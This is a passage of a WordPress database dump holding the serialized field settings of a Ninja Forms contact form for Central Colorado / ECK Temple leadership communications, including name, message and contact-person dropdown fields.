dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8307,67,'personally_identifiable','','personally_identifiable',''),(8308,67,'value','','value',''),(8309,68,'field_label','Last Name','field_label','Last Name'),(8310,68,'field_key','lastname_22','field_key','lastname_22'),(8311,68,'custom_name_attribute','lname','custom_name_attribute','lname'),(8312,68,'personally_identifiable','1','personally_identifiable','1'),(8313,68,'value','','value',''),(1905,59,'key','listselect_98','key','listselect_98'),(1906,59,'container_class','one-half first','container_class','one-half first'),(1907,59,'parent_id','6','parent_id','6'),(12187,379,'user_info_field_group_name','','user_info_field_group_name',''),(12188,379,'user_info_field_group_custom','','user_info_field_group_custom',''),(12117,378,'label','Last Name','label','Last Name'),(12116,378,'def_id','7','def_id','7'),(12111,378,'objectType','Field','objectType','Field'),(12112,378,'objectDomain','fields','objectDomain','fields'),(12113,378,'editActive','','editActive',''),(12114,378,'order','2','order','2'),(12115,378,'type','lastname','type','lastname'),(1939,62,'objectType','Field','objectType','Field'),(1940,62,'objectDomain','fields','objectDomain','fields'),(1941,62,'editActive','','editActive',''),(1942,62,'order','7','order','7'),(1943,62,'type','listselect','type','listselect'),(1944,62,'label','Select The Person You Would Like To Contact','label','Select The Person You Would Like To Contact'),(1945,62,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(1946,62,'label_pos','above','label_pos','above'),(1947,62,'list_type','dropdown','list_type','dropdown'),(1948,62,'multi_size','5','multi_size','5'),(1949,62,'list_show_value','1','list_show_value','1'),(1950,62,'list','a:0:{}','list','a:0:{}'),(1951,62,'user_info_field_group','','user_info_field_group',''),(1952,62,'calc_auto_include','0','calc_auto_include','0'),(1953,62,'user_state','0','user_state','0'),(1954,62,'num_sort','0','num_sort','0'),(1955,62,'admin_label','','admin_label',''),(1956,62,'show_help','0','show_help','0'),(1957,62,'help_text','','help_text',''),(1958,62,'show_desc','0','show_desc','0'),(1959,62,'desc_pos','none','desc_pos','none'),(1960,62,'desc_text','','desc_text',''),(1961,62,'element_class','','element_class',''),(1962,62,'required','1','required','1'),(1963,62,'options','a:5:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"0\";}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:21:\"Initiator-Lisa Boston\";s:5:\"value\";s:21:\"Initiator-Lisa Boston\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"1\";}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:24:\"ESA/Initiator-Tom Boston\";s:5:\"value\";s:24:\"ESA/Initiator-Tom Boston\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"4\";}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"5\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:28:\"ESA/Initiator-Becky Crandell\";s:5:\"value\";s:28:\"esa-initiator-becky-crandell\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:4;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:25:\"ESA/Initiator-Roy Ludwick\";s:5:\"value\";s:25:\"ESA/Initiator-Roy Ludwick\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"6\";}}','options','a:5:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"0\";}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:21:\"Initiator-Lisa Boston\";s:5:\"value\";s:21:\"Initiator-Lisa Boston\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"1\";}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:24:\"ESA/Initiator-Tom Boston\";s:5:\"value\";s:24:\"ESA/Initiator-Tom Boston\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"4\";}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"5\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:28:\"ESA/Initiator-Becky Crandell\";s:5:\"value\";s:28:\"esa-initiator-becky-crandell\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:4;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:25:\"ESA/Initiator-Roy Ludwick\";s:5:\"value\";s:25:\"ESA/Initiator-Roy Ludwick\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"6\";}}'),(8301,66,'field_label','Text','field_label','Text'),(8302,66,'field_key','html_20','field_key','html_20'),(8303,66,'drawerDisabled','','drawerDisabled',''),(8304,67,'field_label','First Name','field_label','First Name'),(8305,67,'field_key','textbox_21','field_key','textbox_21'),(8306,67,'custom_name_attribute','','custom_name_attribute',''),(1964,62,'key','select_the_person_you_would_like_to_contact_1613167025126','key','select_the_person_you_would_like_to_contact_1613167025126'),(1965,62,'container_class','one-half','container_class','one-half'),(1966,62,'drawerDisabled','','drawerDisabled',''),(1967,62,'parent_id','6','parent_id','6'),(1968,63,'objectType','Field','objectType','Field'),(1969,63,'objectDomain','fields','objectDomain','fields'),(1970,63,'editActive','','editActive',''),(1971,63,'order','8','order','8'),(1972,63,'type','textarea','type','textarea'),(1973,63,'label','Enter Your Message Here','label','Enter Your Message Here'),(1974,63,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(1975,63,'label_pos','above','label_pos','above'),(1976,63,'default_value','','default_value',''),(1977,63,'textarea_rte','0','textarea_rte','0'),(1978,63,'textarea_media','0','textarea_media','0'),(1979,63,'disable_rte_mobile','0','disable_rte_mobile','0'),(1980,63,'input_limit','','input_limit',''),(1981,63,'input_limit_type','char','input_limit_type','char'),(1982,63,'calc_auto_include','0','calc_auto_include','0'),(1983,63,'num_sort','0','num_sort','0'),(1984,63,'admin_label','','admin_label',''),(1985,63,'show_help','0','show_help','0'),(1986,63,'help_text','','help_text',''),(1987,63,'show_desc','0','show_desc','0'),(1988,63,'desc_pos','none','desc_pos','none'),(1989,63,'desc_text','','desc_text',''),(1990,63,'element_class','','element_class',''),(1991,63,'required','1','required','1'),(1992,63,'default','','default',''),(1993,63,'key','textarea_102','key','textarea_102'),(1994,63,'placeholder','','placeholder',''),(1995,63,'container_class','','container_class',''),(1996,63,'manual_key','','manual_key',''),(1997,63,'parent_id','6','parent_id','6'),(17609,635,'default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(17607,635,'label','HTML','label','HTML'),(17608,635,'type','html','type','html'),(17606,635,'idAttribute','id','idAttribute','id'),(17605,635,'order','9','order','9'),(17604,635,'editActive','','editActive',''),(17603,634,'drawerDisabled','','drawerDisabled',''),(17601,634,'element_class','','element_class',''),(17602,634,'key','html_1663800618371','key','html_1663800618371'),(17600,634,'container_class','','container_class',''),(2015,65,'objectType','Field','objectType','Field'),(2016,65,'objectDomain','fields','objectDomain','fields'),(2017,65,'editActive','','editActive',''),(2018,65,'order','10','order','10'),(2019,65,'type','submit','type','submit'),(2020,65,'label','Submit','label','Submit'),(2021,65,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(2022,65,'show_help','0','show_help','0'),(2023,65,'help_text','','help_text',''),(2024,65,'show_desc','0','show_desc','0'),(2025,65,'desc_pos','none','desc_pos','none'),(2026,65,'desc_text','','desc_text',''),(2027,65,'processing_label','Processing','processing_label','Processing'),(2028,65,'element_class','','element_class',''),(2029,65,'key','submit_104','key','submit_104'),(2030,65,'container_class','','container_class',''),(2031,65,'parent_id','6','parent_id','6'),(2032,66,'objectType','Field','objectType','Field'),(2033,66,'objectDomain','fields','objectDomain','fields'),(2034,66,'editActive','','editActive',''),(2035,66,'order','1','order','1'),(2036,66,'type','html','type','html'),(2037,66,'label','Text','label','Text'),(2038,66,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(2039,66,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Central Colorado /Â ECK Temple in Colorado Leadership Communications</span></span></span></strong></span></h3>\r\n','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Central Colorado /Â ECK Temple in Colorado Leadership Communications</span></span></span></strong></span></h3>\r\n'),(2040,66,'desc_el','div','desc_el','div'),(2041,66,'show_desc','0','show_desc','0'),(2042,66,'desc_pos','none','desc_pos','none'),(2043,66,'desc_text','','desc_text',''),(2044,66,'element_class','','element_class',''),(2045,66,'default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Central Colorado / ECK Temple in Colorado Leadership Communications</span></span></span></strong></span></h3>\n','default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Central Colorado / ECK Temple in Colorado Leadership Communications</span></span></span></strong></span></h3>\n'),(2046,66,'key','html_20','key','html_20'),(2047,66,'container_class','','container_class',''),(2048,66,'parent_id','8','parent_id','8'),(2049,67,'objectType','Field','objectType','Field'),(2050,67,'objectDomain','fields','objectDomain','fields'),(2051,67,'editActive','','editActive',''),(2052,67,'order','2','order','2'),(2053,67,'type','textbox','type','textbox'),(2054,67,'def_id','6','def_id','6'),(2055,67,'label','First Name','label','First 